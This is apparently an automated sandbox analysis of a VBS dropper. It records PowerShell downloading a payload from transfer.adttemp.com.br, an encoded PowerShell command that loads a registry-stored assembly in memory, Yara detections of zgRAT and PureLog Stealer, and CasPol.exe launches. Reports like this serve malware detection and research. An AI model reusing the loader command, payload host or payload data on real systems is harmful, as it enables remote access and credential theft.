                      Oct 14, 2024 11:15:04.453459978 CEST5504853192.168.2.51.1.1.1
                      Oct 14, 2024 11:15:04.699817896 CEST53550481.1.1.1192.168.2.5
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Oct 14, 2024 11:15:04.453459978 CEST192.168.2.51.1.1.10x6ea9Standard query (0)transfer.adttemp.com.brA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Oct 14, 2024 11:15:04.699817896 CEST1.1.1.1192.168.2.50x6ea9No error (0)transfer.adttemp.com.br104.196.109.209A (IP address)IN (0x0001)false
                      • transfer.adttemp.com.br
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549872104.196.109.2094436500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      TimestampBytes transferredDirectionData
                      2024-10-14 09:15:05 UTC89OUTGET /qcExh/99gram.txt HTTP/1.1
                      Host: transfer.adttemp.com.br
                      Connection: Keep-Alive
                      2024-10-14 09:15:05 UTC309INHTTP/1.1 200 OK
                      Date: Mon, 14 Oct 2024 09:15:05 GMT
                      Server: Transfer.sh HTTP Server 1.0
                      Content-Disposition: attachment; filename="99gram.txt"
                      Content-Length: 384352
                      Content-Type: text/plain; charset=utf-8
                      X-Made-With: <3 by DutchCoders
                      X-Served-By: Proudly served by DutchCoders
                      Connection: close
                      2024-10-14 09:15:05 UTC3787INData Raw: 4d 4a 56 4a 41 56 77 38 64 63 38 7a 6e 63 4b 76 78 58 46 52 6b 7a 37 33 44 35 46 72 77 52 41 6a 69 35 6e 72 33 66 69 73 2b 39 6d 4f 55 49 54 32 2f 67 66 41 41 6d 68 6b 4d 51 33 67 6c 70 36 66 67 4f 39 4e 44 38 41 6d 50 6e 4b 49 79 4b 6d 46 54 65 36 4f 37 41 4a 45 76 79 74 66 61 34 75 32 48 4f 63 52 6e 72 68 44 68 34 7a 64 37 4b 66 51 2b 30 43 51 4c 61 4a 70 54 39 7a 4f 30 50 38 71 52 4f 51 7a 4d 76 41 70 6f 6f 49 42 43 2f 76 74 63 50 2b 43 2f 35 2f 41 55 45 75 64 6a 76 73 2f 4d 57 78 65 36 4a 6c 44 46 45 43 34 2b 6f 31 6a 4b 62 33 66 41 45 53 49 4f 63 47 78 56 59 75 65 56 6e 4b 5a 52 65 78 56 5a 52 70 58 70 50 34 4c 48 6e 34 74 2f 6b 74 52 41 6b 50 30 77 77 42 70 37 75 67 71 76 55 4e 36 4a 73 37 30 48 78 56 56 4e 75 4f 73 78 34 54 4c 48 34 5a 49 73 4a 42
                      Data Ascii: MJVJAVw8dc8zncKvxXFRkz73D5FrwRAji5nr3fis+9mOUIT2/gfAAmhkMQ3glp6fgO9ND8AmPnKIyKmFTe6O7AJEvytfa4u2HOcRnrhDh4zd7KfQ+0CQLaJpT9zO0P8qROQzMvApooIBC/vtcP+C/5/AUEudjvs/MWxe6JlDFEC4+o1jKb3fAESIOcGxVYueVnKZRexVZRpXpP4LHn4t/ktRAkP0wwBp7ugqvUN6Js70HxVVNuOsx4TLH4ZIsJB
                      2024-10-14 09:15:05 UTC4405INData Raw: 70 6f 32 6c 34 6f 53 69 75 72 43 4d 57 55 6d 71 38 39 49 69 67 38 73 72 64 39 31 5a 43 79 33 71 39 37 35 49 51 79 36 79 49 6c 36 54 59 70 70 6c 6b 59 69 4e 41 76 39 53 68 63 38 56 49 63 48 4c 6e 4a 6e 42 72 67 6c 4e 77 31 43 7a 49 2f 50 6c 6c 5a 30 49 31 31 62 7a 70 48 72 52 42 42 4f 46 38 38 76 47 41 2b 52 33 70 6f 4e 61 43 76 6a 61 34 6a 53 4c 4f 57 6e 6e 61 5a 76 33 64 63 5a 45 65 74 59 79 39 59 62 42 53 74 71 6a 31 67 79 77 4c 4d 58 4f 52 50 68 6d 66 4d 62 63 30 62 46 73 30 50 51 50 33 59 39 46 41 4b 31 2f 67 2b 4a 36 69 2f 5a 4c 63 6a 38 6b 4b 62 61 58 36 72 57 33 64 76 57 4a 4c 67 77 49 4b 4a 37 6c 33 78 76 36 33 66 70 4d 4c 47 2f 55 4d 76 38 38 31 79 62 30 30 48 44 5a 4e 74 77 4a 76 38 7a 66 69 6b 41 4c 53 71 72 53 37 62 6c 39 68 49 6d 2b 68 43 49
                      Data Ascii: po2l4oSiurCMWUmq89Iig8srd91ZCy3q975IQy6yIl6TYpplkYiNAv9Shc8VIcHLnJnBrglNw1CzI/PllZ0I11bzpHrRBBOF88vGA+R3poNaCvja4jSLOWnnaZv3dcZEetYy9YbBStqj1gywLMXORPhmfMbc0bFs0PQP3Y9FAK1/g+J6i/ZLcj8kKbaX6rW3dvWJLgwIKJ7l3xv63fpMLG/UMv881yb00HDZNtwJv8zfikALSqrS7bl9hIm+hCI
                      2024-10-14 09:15:05 UTC3595INData Raw: 2f 58 6a 4a 2f 6b 2b 43 71 4e 69 6e 73 2b 61 6c 78 6b 38 74 68 6c 54 48 63 6c 6b 4c 54 4a 34 67 37 69 75 41 79 7a 68 5a 4d 73 43 4b 31 61 4c 52 52 6b 6a 67 4d 70 4d 68 50 58 68 6e 38 50 48 57 75 6e 53 74 74 61 36 64 31 31 66 45 72 37 78 6c 6a 6c 77 6a 6b 72 6c 4c 72 44 45 63 35 41 43 56 53 39 75 53 79 32 6a 41 71 54 6a 36 57 30 2b 73 57 6b 71 5a 4a 37 6b 6c 69 46 70 6f 34 78 47 4a 77 59 41 4e 34 32 77 47 4b 69 36 49 44 62 43 58 61 42 44 4e 61 68 58 52 6d 65 54 70 6c 56 38 30 46 4a 30 6c 32 37 78 49 6e 52 32 52 51 36 74 54 4d 59 42 56 4b 5a 59 46 6f 74 73 68 70 2f 41 66 6f 6d 7a 78 75 62 56 4e 70 6b 79 4e 64 43 52 6d 2f 36 72 55 34 6b 45 38 59 31 32 41 66 6a 30 64 72 78 74 4c 68 59 67 75 50 61 44 45 72 56 34 48 49 58 51 55 75 73 32 6c 6c 4a 42 31 37 45 53
                      Data Ascii: /XjJ/k+CqNins+alxk8thlTHclkLTJ4g7iuAyzhZMsCK1aLRRkjgMpMhPXhn8PHWunStta6d11fEr7xljlwjkrlLrDEc5ACVS9uSy2jAqTj6W0+sWkqZJ7kliFpo4xGJwYAN42wGKi6IDbCXaBDNahXRmeTplV80FJ0l27xInR2RQ6tTMYBVKZYFotshp/AfomzxubVNpkyNdCRm/6rU4kE8Y12Afj0drxtLhYguPaDErV4HIXQUus2llJB17ES
                      2024-10-14 09:15:05 UTC4597INData Raw: 6f 31 56 4e 74 31 70 6f 6a 56 6a 5a 30 49 61 45 38 67 78 38 64 2f 34 67 71 67 36 63 70 49 66 39 6c 6f 48 4a 46 54 38 73 2b 4d 58 65 4c 44 38 41 38 51 78 34 6b 45 59 43 72 4e 6d 47 2f 77 4b 66 66 6a 57 59 6f 42 71 35 31 49 64 50 43 35 50 77 34 32 2b 33 2f 45 33 74 77 68 70 72 63 41 71 52 65 35 52 50 59 70 2f 74 49 63 56 32 4a 48 49 30 65 48 50 76 58 33 32 33 6d 7a 48 65 52 4e 73 6c 6c 67 4a 74 2b 4d 2b 6f 56 49 4f 34 79 79 58 31 58 64 62 63 57 6f 39 63 30 53 46 58 6d 67 43 43 37 53 4e 59 6e 38 6c 6f 79 74 4b 30 65 61 38 64 46 45 47 42 33 56 4b 7a 64 64 33 49 45 56 66 63 4b 77 44 4e 6b 4b 69 41 59 4f 37 63 46 53 47 48 4c 6c 33 44 7a 51 52 72 6a 42 4b 4a 6e 74 6d 67 63 70 42 56 77 65 59 67 49 6e 76 64 69 4f 7a 61 74 2b 71 5a 35 47 47 32 6b 45 30 51 31 61 61
                      Data Ascii: o1VNt1pojVjZ0IaE8gx8d/4gqg6cpIf9loHJFT8s+MXeLD8A8Qx4kEYCrNmG/wKffjWYoBq51IdPC5Pw42+3/E3twhprcAqRe5RPYp/tIcV2JHI0eHPvX323mzHeRNsllgJt+M+oVIO4yyX1XdbcWo9c0SFXmgCC7SNYn8loytK0ea8dFEGB3VKzdd3IEVfcKwDNkKiAYO7cFSGHLl3DzQRrjBKJntmgcpBVweYgInvdiOzat+qZ5GG2kE0Q1aa
                      2024-10-14 09:15:05 UTC3403INData Raw: 2b 4a 78 32 4f 6e 65 38 70 74 55 41 33 6c 66 75 57 75 64 56 78 6c 62 76 6a 33 54 66 6e 57 66 68 46 78 51 55 61 65 41 38 4e 4e 6e 56 55 64 63 65 52 41 41 48 67 30 7a 74 75 73 78 47 6e 4a 47 44 6b 75 6c 32 6e 50 37 54 4f 55 4b 6e 4f 6e 69 76 68 6c 4f 76 35 6f 4f 7a 5a 6e 51 67 4f 36 65 59 71 47 78 71 7a 4f 6a 37 6d 42 54 46 32 51 77 6b 61 76 2f 4b 39 59 78 38 4b 4d 50 53 31 4a 5a 67 47 37 69 35 71 58 4a 30 63 42 39 6b 5a 31 6b 6f 42 50 66 58 45 71 62 43 66 6b 7a 59 75 46 49 6f 59 62 58 4b 30 53 67 59 68 47 77 65 51 38 6a 2f 66 49 34 36 4b 64 4e 34 71 56 49 5a 6c 58 52 2f 70 42 37 57 64 5a 54 37 4b 4b 54 4b 63 4e 63 72 47 65 56 78 45 34 31 52 68 4f 7a 58 66 63 58 44 6f 56 6b 37 78 49 4e 61 4f 41 6a 7a 6e 45 6a 75 52 54 54 6a 48 65 30 57 38 66 33 4a 48 4a 6f
                      Data Ascii: +Jx2One8ptUA3lfuWudVxlbvj3TfnWfhFxQUaeA8NNnVUdceRAAHg0ztusxGnJGDkul2nP7TOUKnOnivhlOv5oOzZnQgO6eYqGxqzOj7mBTF2Qwkav/K9Yx8KMPS1JZgG7i5qXJ0cB9kZ1koBPfXEqbCfkzYuFIoYbXK0SgYhGweQ8j/fI46KdN4qVIZlXR/pB7WdZT7KKTKcNcrGeVxE41RhOzXfcXDoVk7xINaOAjznEjuRTTjHe0W8f3JHJo
                      2024-10-14 09:15:05 UTC4789INData Raw: 30 59 63 4d 4a 43 69 61 61 68 5a 73 70 79 4e 39 49 4c 47 2f 54 2b 78 64 78 5a 43 32 72 71 76 41 4b 55 59 38 49 31 45 6b 42 67 48 64 42 38 45 38 61 55 47 74 47 39 6e 50 43 74 70 38 34 62 70 6a 58 46 38 6a 47 6f 4b 4d 5a 39 49 69 70 56 50 6a 75 2b 53 54 4a 57 62 2f 66 70 66 50 4d 34 6c 5a 51 36 44 6d 58 56 66 30 2f 36 6b 68 38 65 4e 75 54 2f 52 59 66 2f 7a 75 43 35 32 2f 78 65 6b 62 35 70 41 6e 6a 71 59 67 43 79 45 52 68 6b 77 4c 46 7a 37 33 46 53 6e 62 72 72 2b 36 71 63 63 67 54 76 6b 4d 46 66 47 6c 61 69 79 5a 49 6c 6e 78 6e 69 71 51 66 68 6e 49 78 47 4e 6d 79 33 2f 36 58 52 42 6a 57 36 54 79 69 4a 68 6d 74 36 38 36 50 33 42 65 37 2b 57 43 30 69 47 46 35 58 69 34 57 70 34 44 52 58 4d 39 49 63 71 6a 2b 6d 78 33 69 48 63 7a 37 71 52 66 43 56 73 76 44 51 31
                      Data Ascii: 0YcMJCiaahZspyN9ILG/T+xdxZC2rqvAKUY8I1EkBgHdB8E8aUGtG9nPCtp84bpjXF8jGoKMZ9IipVPju+STJWb/fpfPM4lZQ6DmXVf0/6kh8eNuT/RYf/zuC52/xekb5pAnjqYgCyERhkwLFz73FSnbrr+6qccgTvkMFfGlaiyZIlnxniqQfhnIxGNmy3/6XRBjW6TyiJhmt686P3Be7+WC0iGF5Xi4Wp4DRXM9Icqj+mx3iHcz7qRfCVsvDQ1
                      2024-10-14 09:15:05 UTC3211INData Raw: 77 79 36 46 45 45 62 4a 7a 63 78 35 71 7a 2b 32 6b 67 44 50 45 54 67 77 59 32 53 78 6e 43 6a 34 74 77 30 6d 47 47 43 75 4c 65 37 69 38 46 5a 54 45 72 68 49 42 69 77 53 6b 69 75 47 65 34 4d 63 74 4f 66 71 6f 50 65 42 41 49 66 4e 66 41 43 31 6a 42 55 62 64 76 4f 73 4a 4a 33 56 47 64 53 38 32 6e 37 4f 67 4b 6d 54 72 4d 72 65 50 6a 41 39 59 4b 35 67 57 70 45 50 71 7a 7a 47 59 77 6c 65 6a 65 39 2f 4e 66 75 65 58 79 72 38 34 41 54 59 30 53 75 46 4e 66 42 52 49 77 74 7a 49 6c 71 64 76 72 6c 79 48 7a 49 59 70 36 58 7a 69 71 53 55 39 73 2b 44 77 41 35 49 6a 45 72 6c 41 49 34 39 33 72 5a 76 4e 76 55 6c 48 71 53 64 31 42 77 63 77 74 68 56 62 73 37 54 47 65 6d 75 74 65 52 2f 74 48 2f 51 72 58 42 2f 6e 68 2b 43 43 34 57 69 67 63 6d 69 38 42 70 7a 37 33 4a 7a 6e 6e 53
                      Data Ascii: wy6FEEbJzcx5qz+2kgDPETgwY2SxnCj4tw0mGGCuLe7i8FZTErhIBiwSkiuGe4MctOfqoPeBAIfNfAC1jBUbdvOsJJ3VGdS82n7OgKmTrMrePjA9YK5gWpEPqzzGYwleje9/NfueXyr84ATY0SuFNfBRIwtzIlqdvrlyHzIYp6XziqSU9s+DwA5IjErlAI493rZvNvUlHqSd1BwcwthVbs7TGemuteR/tH/QrXB/nh+CC4Wigcmi8Bpz73JznnS
                      2024-10-14 09:15:05 UTC4981INData Raw: 4b 7a 34 64 42 58 6e 67 72 63 4b 35 63 77 71 63 68 35 78 61 77 43 2f 68 34 31 68 6b 7a 58 34 47 4a 58 4e 43 70 65 52 47 6f 4d 42 4b 65 37 66 32 39 34 54 4c 41 66 4f 72 38 5a 66 6a 43 72 61 50 57 41 31 74 71 62 51 6d 66 61 4e 7a 5a 2b 47 31 6b 44 32 61 65 63 4d 4a 6f 32 6c 74 55 77 53 67 59 4e 35 4b 70 59 66 33 5a 61 42 30 4d 62 4e 6e 36 57 37 65 6c 62 35 78 76 2f 70 48 72 2b 56 79 75 76 4e 73 57 61 4b 64 79 74 6b 65 73 61 30 36 32 66 49 46 6d 6b 33 37 74 39 4a 38 46 58 49 74 4a 59 4d 48 71 49 71 4b 6a 31 6d 6d 74 59 36 47 61 32 6e 71 52 69 78 46 42 7a 2b 44 39 45 66 2b 6b 39 6b 6b 6b 2f 6e 6f 67 58 6f 37 63 52 73 39 63 58 79 70 33 79 75 76 76 37 78 42 48 62 57 4e 38 56 36 6f 73 50 74 5a 47 34 5a 72 61 58 4a 6b 6e 39 77 72 62 31 76 2b 44 33 71 54 56 79 69
                      Data Ascii: Kz4dBXngrcK5cwqch5xawC/h41hkzX4GJXNCpeRGoMBKe7f294TLAfOr8ZfjCraPWA1tqbQmfaNzZ+G1kD2aecMJo2ltUwSgYN5KpYf3ZaB0MbNn6W7elb5xv/pHr+VyuvNsWaKdytkesa062fIFmk37t9J8FXItJYMHqIqKj1mmtY6Ga2nqRixFBz+D9Ef+k9kkk/nogXo7cRs9cXyp3yuvv7xBHbWN8V6osPtZG4ZraXJkn9wrb1v+D3qTVyi
                      2024-10-14 09:15:05 UTC3019INData Raw: 79 4a 6a 69 50 67 71 33 42 5a 4a 4d 75 51 41 38 52 4e 71 72 43 4f 59 58 37 73 4e 4c 62 33 50 55 64 59 6b 33 76 67 55 30 4c 66 39 79 4d 69 56 71 51 42 5a 70 4c 35 6c 43 79 43 31 36 36 52 4f 57 59 6f 57 2b 78 6d 31 33 54 6e 5a 79 61 52 38 6e 2b 66 75 57 71 35 6b 36 41 63 35 37 6d 41 56 7a 66 50 41 59 38 46 38 6f 75 76 43 47 77 4c 4c 67 39 6f 6a 73 72 63 65 73 70 4b 30 6a 46 73 48 42 39 32 43 33 79 7a 6e 43 49 74 63 55 6c 37 31 6e 4b 76 4c 38 4d 45 55 33 74 54 49 71 58 74 2f 67 49 33 41 38 73 67 65 4c 66 4a 4e 31 47 48 36 31 4d 75 34 56 74 4e 6c 56 64 36 6c 45 36 76 6e 2b 5a 2f 66 37 53 5a 79 6a 73 4b 64 61 42 7a 30 34 49 43 46 47 45 2b 42 39 69 58 64 2b 6b 62 43 41 4f 74 31 64 6d 63 65 66 46 41 68 52 72 65 73 63 70 51 50 55 4c 34 4b 7a 30 61 6b 66 78 4a 62
                      Data Ascii: yJjiPgq3BZJMuQA8RNqrCOYX7sNLb3PUdYk3vgU0Lf9yMiVqQBZpL5lCyC166ROWYoW+xm13TnZyaR8n+fuWq5k6Ac57mAVzfPAY8F8ouvCGwLLg9ojsrcespK0jFsHB92C3yznCItcUl71nKvL8MEU3tTIqXt/gI3A8sgeLfJN1GH61Mu4VtNlVd6lE6vn+Z/f7SZyjsKdaBz04ICFGE+B9iXd+kbCAOt1dmcefFAhRrescpQPUL4Kz0akfxJb
                      2024-10-14 09:15:05 UTC5173INData Raw: 31 56 65 58 45 66 4f 68 48 34 58 57 62 36 62 68 39 37 76 6e 37 6f 39 31 47 75 77 6b 45 70 52 35 78 61 63 41 4c 72 54 59 41 75 66 53 50 70 56 48 79 38 31 66 74 46 6a 51 39 70 4f 58 78 71 30 42 2b 4a 31 69 57 59 4b 4f 43 77 6f 51 50 63 42 45 4b 4a 76 66 55 35 59 37 7a 57 38 68 43 6e 2b 41 56 6a 62 38 39 78 55 70 65 44 68 79 71 7a 30 46 55 65 6b 61 64 58 39 76 61 50 5a 4e 36 73 71 38 64 44 2f 52 38 6f 74 39 71 54 6c 76 6d 34 6b 66 49 50 33 56 47 6b 59 74 6b 59 34 2b 74 45 61 4c 48 4f 34 63 36 32 6b 36 78 72 6e 6b 45 54 76 68 75 6c 4d 33 56 71 44 33 49 66 73 69 61 38 4c 52 58 6d 4a 36 5a 75 6e 62 6c 50 66 6f 67 71 41 30 73 45 6f 6e 49 78 30 43 69 65 4b 50 75 47 62 58 6c 57 70 64 61 32 72 36 65 45 76 54 45 76 4b 78 37 31 62 34 62 57 31 58 72 6a 6e 7a 68 48 4e
                      Data Ascii: 1VeXEfOhH4XWb6bh97vn7o91GuwkEpR5xacALrTYAufSPpVHy81ftFjQ9pOXxq0B+J1iWYKOCwoQPcBEKJvfU5Y7zW8hCn+AVjb89xUpeDhyqz0FUekadX9vaPZN6sq8dD/R8ot9qTlvm4kfIP3VGkYtkY4+tEaLHO4c62k6xrnkETvhulM3VqD3Ifsia8LRXmJ6ZunblPfogqA0sEonIx0CieKPuGbXlWpda2r6eEvTEvKx71b4bW1XrjnzhHN


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:05:14:21
                      Start date:14/10/2024
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs"
                      Imagebase:0x7ff7056f0000
                      File size:170'496 bytes
                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:3
                      Start time:05:15:01
                      Start date:14/10/2024
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA
                      Imagebase:0x7ff7be880000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000003.00000002.3382819373.000001A9C3610000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.3382819373.000001A9C3610000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.3372776875.000001A9BB668000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high
                      Has exited:false

                      Target ID:4
                      Start time:05:15:01
                      Start date:14/10/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:6
                      Start time:05:15:05
                      Start date:14/10/2024
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
                      Imagebase:0x2b8c4120000
                      File size:108'144 bytes
                      MD5 hash:C91C5994E9C0F1690C296B57DFCD2EDF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:7
                      Start time:05:15:05
                      Start date:14/10/2024
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
                      Imagebase:0x2c9980f0000
                      File size:108'144 bytes
                      MD5 hash:C91C5994E9C0F1690C296B57DFCD2EDF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:8
                      Start time:05:15:05
                      Start date:14/10/2024
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
                      Imagebase:0x2087dbf0000
                      File size:108'144 bytes
                      MD5 hash:C91C5994E9C0F1690C296B57DFCD2EDF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:9
                      Start time:05:15:05
                      Start date:14/10/2024
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
                      Imagebase:0x25c66dc0000
                      File size:108'144 bytes
                      MD5 hash:C91C5994E9C0F1690C296B57DFCD2EDF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:10
                      Start time:05:15:05
                      Start date:14/10/2024
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
                      Imagebase:0x277b84f0000
                      File size:108'144 bytes
                      MD5 hash:C91C5994E9C0F1690C296B57DFCD2EDF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Reset < >

                        Execution Graph

                        Execution Coverage:3%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:3
                        Total number of Limit Nodes:0
                        execution_graph 6655 7ff848e87b52 6656 7ff848e92fd0 CreateProcessA 6655->6656 6658 7ff848e93418 6656->6658

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3384780716.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7ff848e80000_powershell.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 274b7304ab59cba3d429efc854bd22a0ad0a1e0642cc3923d11ab3fd9e4e6e08
                        • Instruction ID: 7c3430dd42b78f7351eb07e59431276127cd942d3cc624e1110836e5babbf822
                        • Opcode Fuzzy Hash: 274b7304ab59cba3d429efc854bd22a0ad0a1e0642cc3923d11ab3fd9e4e6e08
                        • Instruction Fuzzy Hash: 20F14D70918A8D8FEBB8EF18C855BE977E1FB59341F00512AD80ED7291DB74A680CB85

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 53 7ff848f51690-7ff848f51694 54 7ff848f51697-7ff848f5169c 53->54 55 7ff848f516f2-7ff848f51751 53->55 54->55 61 7ff848f51754-7ff848f51765 55->61 62 7ff848f51753 55->62 63 7ff848f51768-7ff848f517f4 61->63 64 7ff848f51767 61->64 62->61 68 7ff848f51919-7ff848f519c9 63->68 69 7ff848f517fa-7ff848f51804 63->69 64->63 106 7ff848f519cc-7ff848f519dd 68->106 107 7ff848f519cb 68->107 70 7ff848f5181d-7ff848f51822 69->70 71 7ff848f51806-7ff848f51813 69->71 73 7ff848f51828-7ff848f5182b 70->73 74 7ff848f518ba-7ff848f518c4 70->74 71->70 78 7ff848f51815-7ff848f5181b 71->78 73->74 79 7ff848f51831-7ff848f51834 73->79 76 7ff848f518c6-7ff848f518d2 74->76 77 7ff848f518d3-7ff848f51916 74->77 77->68 78->70 82 7ff848f5185b 79->82 83 7ff848f51836-7ff848f5184a 79->83 86 7ff848f5185d-7ff848f5185f 82->86 93 7ff848f5184c-7ff848f51859 83->93 86->74 89 7ff848f51861-7ff848f5186b 86->89 89->74 97 7ff848f5186d-7ff848f5187b 89->97 93->86 97->93 100 7ff848f5187d-7ff848f51883 97->100 102 7ff848f5188a-7ff848f51893 100->102 104 7ff848f518ac-7ff848f518b9 102->104 105 7ff848f51895-7ff848f518a2 102->105 105->104 111 7ff848f518a4-7ff848f518aa 105->111 109 7ff848f519df 106->109 110 7ff848f519e0-7ff848f51a7a 106->110 107->106 109->110 115 7ff848f51a80-7ff848f51a8a 110->115 116 7ff848f51bc2-7ff848f51c8b 110->116 111->104 117 7ff848f51a8c-7ff848f51aa1 115->117 118 7ff848f51aa3-7ff848f51aa8 115->118 117->118 120 7ff848f51aae-7ff848f51ab1 118->120 121 7ff848f51b62-7ff848f51b6c 118->121 123 7ff848f51af6 120->123 124 7ff848f51ab3-7ff848f51ac2 120->124 125 7ff848f51b7d-7ff848f51bbf 121->125 126 7ff848f51b6e-7ff848f51b7c 121->126 130 7ff848f51af8-7ff848f51afa 123->130 124->116 136 7ff848f51ac8-7ff848f51ad2 124->136 125->116 130->121 131 7ff848f51afc-7ff848f51b02 130->131 133 7ff848f51b04-7ff848f51b1f 131->133 134 7ff848f51b21-7ff848f51b34 131->134 133->134 147 7ff848f51b4d-7ff848f51b61 134->147 148 7ff848f51b36-7ff848f51b43 134->148 139 7ff848f51aeb-7ff848f51af4 136->139 140 7ff848f51ad4-7ff848f51ae9 136->140 139->130 140->139 148->147 151 7ff848f51b45-7ff848f51b4b 148->151 151->147
                        Memory Dump Source
                        • Source File: 00000003.00000002.3385752258.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7ff848f50000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c4f7d8b87f017cc07d9002c149e76d487f7528b0662b223f5c147ecc93109ef1
                        • Instruction ID: e00f7a5dc4a107b9dc315edea6638efff5efc45bfbd9c306ff40b2f2ecd68767
                        • Opcode Fuzzy Hash: c4f7d8b87f017cc07d9002c149e76d487f7528b0662b223f5c147ecc93109ef1
                        • Instruction Fuzzy Hash: 64127631E0DA895FE7A6AB2C58142B6BBE1EF46364F1801BBD04DC71D3EE18AC46C355

                        Control-flow Graph

                        • Executed
                        • Not Executed
